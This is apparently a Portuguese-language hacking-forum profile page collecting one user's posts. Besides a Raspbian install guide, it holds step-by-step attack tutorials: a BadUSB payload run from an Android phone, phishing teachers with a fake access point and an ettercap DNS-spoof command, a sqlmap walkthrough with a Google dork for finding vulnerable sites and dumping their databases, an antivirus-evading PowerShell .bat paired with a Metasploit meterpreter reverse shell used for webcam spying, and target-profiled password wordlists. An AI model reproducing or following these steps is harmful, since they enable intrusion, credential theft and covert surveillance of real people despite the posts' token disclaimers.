Jump to content

ja1_

Members
  • Content Count

    13
  • Joined

  • Last visited

Community Reputation

5 Neutral

1 Follower

About ja1_

  • Rank
    KICKED

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Você acabou de comprar um Raspberry Pi e não sabe por onde começar? (até pq o manual é extremamente superficial...) Vou ensinar hoje a instalar o Raspbian de forma adequada no seu Raspberry Pi! Raspbian, para quem ainda não é familiarizado, é o sistema feito pela empresa que produz o Raspberry Pi. Na minha opinião, é possível desenvolver quase tudo utilizando essa distro, que é bem flexível e "user-friendly". Nesse primeiro post vou ensinar da maneira mais simples possível! Itens necessários: - Raspberry Pi (1, 2 ou 3) - Cartão SD de no mínimo 8gb (e adaptador SD>USB se o seu computador não possuir entrada para SD) - Download do NOOBS: https://www.raspberrypi.org/downloads/noobs/ (baixe o NOOBS normal, não o LITE) - SD formatter: https://goo.gl/hTPGG7 - Mouse comunzão - Cabo HDMI - Monitor ou tv - Cabo de energia do RPi (microUSB) - Fé e força de vontade Se já tem tudo necessário: Conecte o cartão SD no computador e abra o SD formatter Cheque se a letra do dispositivo mostrado no SD formatter é a mesma do SD! No meu caso era "G:/" Clique em "format" e espere (CASO SEU SD NÃO ESTEJA PARTICIONADO, CLIQUE EM OPTIONS E ATIVE O SIZE ADJUSTMENT ANTES DE FORMATAR) Depois de ter formatado 10/10 extraia o zip do NOOBS no cartão SD, simple as that Monte seu RaspberryPi, coloque o sd, ligue o HDMI, conecte o mouse e ligue o RPi Ele deve "bootar" e depois irá aparecer essa tela: Selecione raspbian e clique em install! Pronto, agora é só esperar o fim da instalação e clicar em OK na dialog box que vai aparecer (OS installed sucessfully) O raspberry vai dar um reboot de levs E essa tela deve aparecer: A partir daqui um teclado vai ser necessário use as setas e vá até finish e pressione enter! A UI já vai aparecer e você já poderá começar a usar OBS: o user padrão é "pi" e a senha é "raspberry" é isso ~ja1
  2. Acho que você só vai encontrar nessa faixa, os outros são de baixa qualidade e são descartaveis
  3. Você manja de terminal? Não, mas eu sei q Ta faltando o diretório. Não sei como arruma isso Man antes de continuar recomendo que se aprofunde um pouco no básico, até te ajudo se quiser : Mas sem isso não dá Man, você instalou a API?
  4. Hey Guys, dboa? Hoje o tutorial é do cara*** Vocês já ouviram falar de BADUSB ou USB Rubber Ducky? [/img] Esses "pendrives" são aqueles usados na série Mr.robot na primeira season, quando a Darlene larga vários pendrives em frente a delegacia (T1E6), e na segunda season eles aparecem de novo na parte da preparação pro ataque ao FBI (não vou dar detalhes pra evitar spoilers....) Mas o que eles fazem de verdade? simples eles simulam um teclado e realizam uma determinada "sequencia" de dígitos assim que são plugados. Mas tudo ocorre em uma velocidade muito rápida e dependendo do script podem ser imperceptíveis. Um cenário comum no uso desses Rubber Ducky's é que a sequencia de digitos fará Download de um backdoor e o executará ou conectará o computador a uma rede e executará um backdoor, as opções são imensas.... Para ter acesso a esses USB's você pode comprar um por $8 sem as taxas de envio ou utilizar o seu celular android como eu vou ensinar a seguir... Creio que não exista nenhum outro tutorial Brasileiro para uso do que vou ensinar a seguir, então sintam-se "lisonjeados" :3 EDIT: VÍDEO DE DEMONSTRAÇÃO [video=youtube] não é meu é de um gringo aí Vamos ao tutorial Requisitos: Terminal emulator: https://play.google.com/store/apps/details?id=jackpal.androidterm&hl=pt Busybox: https://play.google.com/store/apps/details?id=stericson.busybox&hl=pt (Precisa de root) Observação: O termux do tutorial passado não pode ser utilizado aqui, pois ele simula um terminal, não realiza alterações ou leituras avançadas no sistema Android, já o Terminal emulator é capaz de fazer isso, porém não possui apt e não permite a instalação de Python (de forma fácil) por exemplo. DroidDucky: https://github.com/anbud/DroidDucky payload.dd: https://ghostbin.com/paste/5xm6v (copie e salve num arquivo e nomeie pra 'payload.dd', deixe na mesma pasta do droidducky) Comandos: Conecte o celular ao computador via USB Abra o Terminal Emulator (no celular) e digite su Depois vá até o diretorio que você colocou o DroidDucky e o Payload.dd cd /data/local/tmp (no meu caso...) Depois execute o DroidDucky bash droidducky.sh payload.dd Assim: O CMD deve aparecer no Windows com a mensagem que nós configuramos Pra criar seus scripts pesquisem na net BADUSB scripting, não é dificil... É isso Guys ~~~bjs do ja1 Disclaimer (aviso em Malaio): Alguns celulares podem não possuir os drivers necessários (HID) pra realizar esse procedimento, esse GitHub possui alguns, dê uma lida e adicione os drivers para o seu cel (se disponivel) https://github.com/pelya/android-keyboard-gadget Se você for foda mesmo vai desenvolver no bloco de notas esses drivers :V
  5. Infelizmente o meu router era um android, e as possibilidades são bem limitadas, não daria pra rodar um ettercap diretamente, o RPi2 foi bem simples, dois adaptadores de rede = a 2 ip's Um IP hosteava um server web normal O outro realizava ataque de DNS spoof na rede. Sim eu sei que poderia ser mais simples, mas na época essa foi a forma mais rápida e eficiente que eu consegui estruturar.... Pra diminuir a suspeita o router fornecia sim acesso normal a internet, só não completava pro site da escola nem pro ip da intranet É isso
  6. HUSHUASUAHSUASHAU, valeu man Ah tu consegue sim, é só estruturar direitinho
  7. Hey Hackers, dboa? To feliz vai ser tudo verde agora Bom, hoje vou lhes contar a vez em que invadi a Intranet da Escola Para aqueles que não manjam Intranet é tipo o sistema interno que empresas possuem para manter tudo organizado e de fácil acesso quando necessário, existem diversas Intranets diferentes, algumas são pré-prontas com pequenas modificações na aparência (CMS) outras são feitas para aquela empresa em especifico, como a do "alvo em questão". Bom, vamos a historia... Todo ano tem Feira de ciências na minha escola, e em um ano o tema foi tecnologia e eu resolvi fazer uma demonstração da falta de segurança a qual estamos expostos... Tive a brilhante ideia de fazer um pentest na escola (pra chamar atenção dos professores e ganhar uns pontos e tals) Fui até a diretora e pedi autorização, pois sou um bom menino :3 Ela não só deixou como adorou a ideia, eu pedi pra ela não falar pra ninguém e que no dia da feira eu mostraria o procedimento e o quão fácil foi pra realizar (ainda nem sabia como ia fazer isso....) No caso da minha escola, os professores mandam tudo pro site da escola (que é conectado a intranet), tudo mesmo notas, quem fez as atividades, quem estava presente e tals... Passei dias pensando em como realizar o ataque, analisei todo o sistema, tinha umas falhas, mas nada que fosse chamar a atenção das pessoas.... Foi aí que decidi utilizar a Engenharia social, o ser humano adora ser enganado e depois perceber que foi enganado de uma forma simples.... Meu plano era simples, eu criaria um FakeAP (vou ensinar como criar um logo abaixo...) que quando o Professor tentasse ir para o site do colégio para fazer o login ele redirecionasse para uma pagina falsa, clonada da original, que ao invés de realizar o login salvaria as credenciais do professor em uma DB (também vou ensinar...) Mas como fazer o professor entrar no wi-fi e fazer login lá? simples diga pra ele fazer isso... Eu criei uns papeis fakes e pedi pra amigos colarem nas mesas dos professores discretamente Pika dos papeis pra provar que é vdd: De qualquer forma eu ainda precisava de um FakeAP, tive uma ideia simples abrir modo de roteador com o celular e usar o meu raspberry Pi 2 com dois adaptadores wi-fi, um como server da página fake e outro realizando DNSspoof (do site da escola pra página fake) Anyway no dia do ataque deu certo, quem não gosta de um Wi-fi de graça... Como eu fiz tudo: A pagina fake eu salvei a pagina real, fui no notepad++, fui nos forms e mudei o "action=" para um php meu. Isso entra em programação... Depois eu ensino com mais exatidão como fazer isso Um FakeAP (Fake Acess Point em turco), é um roteador falso, que não necessita de internet e pode ser utilizado para capturar senhas, dados, definir downloads automáticos de Backdoor's e tals as possibilidades são infinitas e varia de acordo com a sua criatividade... Existem diversas maneiras de se criar um, no meu caso o FakeAP foi composto por 3 "aparelhos", um router (meu android (LG G2)) e um RPi com dois adaptadores wi-fi, um com um server e um configurado para DNSspoof COMO FAZER DNS SPOOF bom eu fiz pelo ettercap o comando é simples ettercap -T -q -M arp -i eth0 -P dns_spoof // mas antes você tem que editar o arquivo /etc/ettercap/etter.dns e adicionar os addr a serem spoofados O server fake foi bem simples Apache server e tals (quem manja, manja) é isso guys, to com sono bagarai nem ficou muito bom mais a historia é veridica ~~~bjs do ja1
  8. Olá haskers, dboa? Esse e o primeiro post da serie "mobile hacking", que vai ser uma serie onde eu ensino a fazer diversos ataques utilizando o celular chega do verde Bom vou responder primeiro a algumas possíveis perguntas: 1 - Vou poder fazer isso no meu iPhone / Windows Phone? Poder você até pode, mas eu não vou ensinar aqui (), tudo que eu for passar nessa serie é limitado ao Android, por ser Linux Based (Não me venha com: "mas WP é windows", se disser isso eu te haskeio). Então se você for usuário de outro sistema que não seja o Android e está muito interessado em hackear pelo celular, adquira um, se precisar de ajuda na escolha sinta-se livre para me mandar uma mensagem 2 - Ah mas você só vai me ensinar a mexer no terminal ou fazer coisas que eu já sei fazer no Desktop só que pelo celular?? Sim, mas não é tão simples quanto parece, diversos requerimentos pra rodar alguns scripts (como libs por exemplo) não estão presentes no Android nativamente, vou ensinar como "instalar" tais requerimentos para poder utilizar dos scripts... 3 - Eu preciso ter root no meu celular?? Nesse primeiro tutorial não, mas nos próximos sim, pois iremos trabalhar com a edição de pastas do sistema do Android que vem nativamente bloqueadas e só podem ser acessadas após o root. 4 - Eu vou conseguir fazer o que o Elliot fez na serie na parte da delegacia? Sim, mas eu vou segurar bastante esse tutorial :3 Bom vamos ao tutorial Recomendo bastante atenção, um movimento errado e seu celular pode virar uma mini ogiva nuclear de alta potencia e gerar uma grande devastação... (fecha essas pornografia aí) Vamos precisar dos seguintes apps: Termux: https://play.google.com/store/apps/details?id=com.termux&hl=pt_BR Termux:API (para ter acesso ao APT) https://play.google.com/store/apps/details?id=com.termux.api&hl=pt_BR Observação: O Termux só está disponível para os celulares com versão 5.0 ou superior do Android, caso não esteja nessa versão mais queira tentar do mesmo jeito utilize esse app : https://play.google.com/store/apps/details?id=com.gnuroot.debian&hl=pt_BR (Podem haver alguns erros durante o procedimento, comenta aí que eu ajudo) E por ultimo o meu preferido por causa do nome Hacker's Keyboard https://play.google.com/store/apps/details?id=org.pocketworkstation.pckeyboard&hl=pt_BR É um teclado comum que possui coisas de um teclado de Desktop como Shift, Tab e outros... Vamos aos procedimentos Após instalar tudo da lista acima, abra o Termux e digite: apt update pode acontecer de ele dizer que o apt ainda não foi instalado, mas aí você digita isso: apt install apt (É sério '-') depois de "ativar" o nosso amigo apt, iremos instalar o python digite: apt install python e depois apt install python3 (para futuros tutoriais) Agora que temos o Pitão, vamos descolar aquele SQLmap deliciouser no termux digite: apt install git depois, vamos clonar o Rep do Sqlmap digite: git clone https://github.com/sqlmapproject/sqlmap.git quando o download terminar e você for capaz comandar esse cavalo silvestre que chamamos de terminal digite: cd sqlmap-master e pronto, se você já souber fazer ataques SQLi você já tem tudo necessário. caso não saiba aqui vai um quick tutorial (tutorial rápido em coreano)... Digite: python sqlmap.py Só pra ter certeza que está tudo ok. Depois selecione um site alvo (não tente google plmds) uma dork pra achar alvos é essa: "inurl: php?id=", Joga isso no google que é sucesso Para saber se um site pode ou não ser vulnerável adicione uma aspa no final da url, por exemplo sitedopao.com.br/index.php?id=101 você coloca uma aspa no final sitedopao.com.br/index.php?id=101' e dá enter Se der algum erro de php, há uma chance de vulnerabilidade... Voltando ao termux Digite: python sqlmap.py -u sitedopao.com.br/index.php?id=101 --dbs Esse "-u" é pra determinar que o que vem a seguir é a url do site a ser explorado o "-dbs" é pra determinar o que você quer que o SQLmap faça, nesse caso --dbs é para testar o site e trazer o nome das DB's nele presente Depois digite: python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB vem aqui" --tables Esse "-D" é pra determinar que o que vem a seguir é a Database a ser explorada o "--tables" é para testar o site e trazer o nome das tables que estão na DB And after that, type: python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB" -T "nome da tabela" --columns Esse "-T" define a tabela da DB a ser explorada o "--columns" é pra determinar que você quer saber as colunas presentes nessa tabela e por ultimo: python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB" -T "nome da tabela" -C "nome da coluna" --dump o "--dump" é pro SQLmap tentar trazer o conteúdo das tabelas **** Para pegar o conteúdo de múltiplas tabelas e só colocar "-C tabela1,tabela2,tabela3(...)tabela8008" **** Se você for ixpertinho vai procurar coisas que tenham "user", "admin", "login" e tals Mas como sempre eu tenho que te lembrar que invadir sites assim é crime, faça isso com permissão do dono do site ou procure um site de testes como por exemplo o http://testphp.vulnweb.com/ Não me responsabilizo pelos seus atos Então é isso guys, acho que amanhã saí o "Aventuras de um hasker #1" e o Mobile Hacking #2 Me digam o que acharam!! avaliem e deem criticas.... flws ~~ Bjs do Ja1
  9. Olá hackers, hoje venho compartilhar esse ".bat" que é ignorado por alguns anti-vírus Algumas observações: Esse tutorial tem fins educativos, nem eu, nem o forum nos responsabilizamos pelos seus atos!! Invasão de "dispositivos informaticos" é crime http://www.planalto.gov.br/ccivil_03/_ato2011-2014/2012/lei/l12737.htm Bom chega de avisos e vamos para o tutorial Requisitos: Se você possuir uma VM de Kali Linux você já tem tudo que é necessario Mas, se você está pelo windows você vai precisar baixar: -Phyton 2.7: https://www.python.org/ (BAIXE O 2.7) -Ruby: http://rubyinstaller.org/ -Setoolkit: https://github.com/trustedsec/social-engineer-toolkit/ (faça download de tudo como .zip) -PyCrypto: http://www.voidspace.org.uk/python/modules.shtml#pycrypto -Metasploit: http://www.metasploit.com/ (a versão free e mais do que suficiente) Não vou me aprofundar nas instalações, não requer muita habilidade, até mesmo você irá conseguir (mas se mesmo assim houver algum erro, comente que eu irei responder o mais rapido possivel) -- tente instalar tudo na pasta C:\ para facilitar o encontro das pastas pelo cmd Passo 1 - Abra o cmd e digite cd C:\(pasta do setoolkit) renomeie o arquivo sem extensão "setoolkit" para setoolkit.py - Digite setoolkit.py, aceite os termos de uso (y) - Esse menu irá aparecer: - Digite "1" (sem aspas {claro neah '-'}) - Referente a Social-Engineering Attacks - Esse segundo menu irá aparecer: - Digite "9" (sem aspas {claro neah '-'}) - Referente a Powershell Attack Vectors Depois esse último irá aparecer: - Digite "1" (sem aspas {claro neah '-'}) - Referente a Powershell Alphanumeric Shellcode Injector - Vai aparecer o seguinte texto: IP address for the payload listener (LHOST): - E ai você coloca seu ip externo ou interno (externo é pra você que tem um amigo disposto a ser hackeado em nome da eduação, só se ele estiver SABENDO que será hackeado, caso contrario a policia aparerá na sua casa em alguns segundos e te prenderá 4ever) - Vai aparecer o seguinte texto: Enter the port for the reverse [443]: - Ai você digita uma porta aberta do seu roteador (creio que se você está aqui, você sabe como abrir portas no roteador) - Vai aparecer o seguinte texto: Do you want to start the listener now [yes/no]: - Você Digita "no" Passo 2 - Abra outra janela do cmd, e digite: cd C:\metasploit-framework\bin - depois digite "msfconsole.bat" - e espere, pode demorar um pouco - Vai aparecer esse menu: -Você ira digitar: use multi/handler -depois: set PAYLOAD windows/meterpreter/reverse_tcp e - set LHOST (seu ip interno) - set LPORT (porta definida previamente) - depois você pode digitar; "exploit" ou "run" para iniciar o listener Passo 3 - Nesse momento você vai na pasta setoolkit\src\program-junk\reports e copie o x86_powershell_injection.txt para seu desktop ou de uma vm -renomeie de ".txt" para .bat e envie para seu amigo que sabe que será hackeado - quando ele abrir algo assim irá aparecer: [*]Started reverse TCP handler on 192.168.0.102:443 [*]Starting the payload handler... [*]Sending stage (957999 bytes) to 192.168.0.102 [*]Meterpreter session 1 opened (192.168.0.102:443 -> 192.168.0.102:4979) at 2016-03-06 12:59:48 -0300 [*] se você digitar "help" todas as opções de controle irão aparecer. As mais legais são: -- sysinfo (vai trazer informações basicas do pc) -- webcam_list (mostra as cameras disponiveis) -- webcam_chat (inicia uma video chamada {esse eu acabei de descobrir :v}) -- webcam_snap (tira uma foto com a webcam principal) -- shutdown (desliga o pc) e varios outros, é só você ir explorando aos poucos, e ler as descrições Então é isso, se tiver duvidas comente scan: https://www.virustotal.com/pt/file/900f8833a66ae9ceb920044b824e72d8947150a9e357f17bdaf96c9fb8aa15f5/analysis/1457277007/ ~~bjs do Ja1 (Infos extras: esse tuts é meu (bem antigo) que eu postei em um fórum que "morreu", tá mal formatado pq eu fiz pelo cel, mas o conteúdo e legal)
  10. Olá Haskers Vou ensinar a como criar wordlists para um alvo em especifico utilizando o script "cupp" Chega da cor dos hask pq sim Bom pra começar vocês precisam clonar o rep do cupp no github: https://github.com/Mebus/cupp Se você não souber como se clona um rep no github é bem simples: No Linux: Abra o terminal e digite git clone https://github.com/Mebus/cupp e espere, caso você não tenha o "git" é só baixar via apt No Windows: No windows também há como baixar pelo cmd, massss para facilitar simplesmente abra o link do github e clique em "clone or download" e selecione 'zip download' Bem easy Você também vai precisar do python: Site do pitão Dá teus pulo pra instalar Vamos começar Se estiver pelo Linux abra o terminal e vá até a pasta do cupp cd cupp-master Já no Windows é só extrair pra pasta que você quiser depois clicar na pasta com o botão direito segurando "Shift" Aí é só escolher "abrir janela de comando aqui" Quando você estiver na pasta é só executar o script: py cupp.py -i (No windows) python cupp.py -i (No Linux) E isso deve aparecer: O diferencial do Cupp é que ele te faz perguntas sobre o Alvo e depois monta uma wordlist Daí pra frente é só ir respondendo, o que você não souber é só apertar "Enter" que vai pra próxima pergunta. Bom nesse caso aqui o perfil de nosso alvo é esse: (ficticio) -Nome: José Alves Braga -Nascimento: 10/12/1988 -Apelido: Zé -Nome da "esposa": Carla Silva Braga -Nascimento: 22/05/1984 -Sem Apelido -Sem filhos José e Carla possuem um Cachorro e adoram postar foto dele no Facebook ¯\_(ツ)_/¯ -Nome do cachorro: Rex José tem 28 anos e tem muito orgulho de seu trabalho como "Entregador de pizza" na pizzaria pizza boa, em todo encontro de amigos ele conta suas historias de motoboy (¯\_(ツ)_/¯) Após esses dados o cupp te dá uma opção de adcionar keywords da vitima, por exemplo: José joga LOL , seu nick é ZeDaPizza, ele também adora sua hornet 1000 grau e chama ela de "Bala dourada". As keywords seriam algo como: "lol, league, of, legends, hornet, pizza, zedapizza, bala, dourada" Após essas respostas o cupp gera um txt com variações de possiveis senhas A wordlist de José está aqui: https://ghostbin.com/paste/5qer4 Todas as infos que o cupp pedem podem ser descobertas com 30 minutos dando uma olhada no Facebook do "Alvo" Bom guys, foi isso. Não me responsabilizo pelo que você fizer com o conhecimento aqui compartilhado Bjs do ja1
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.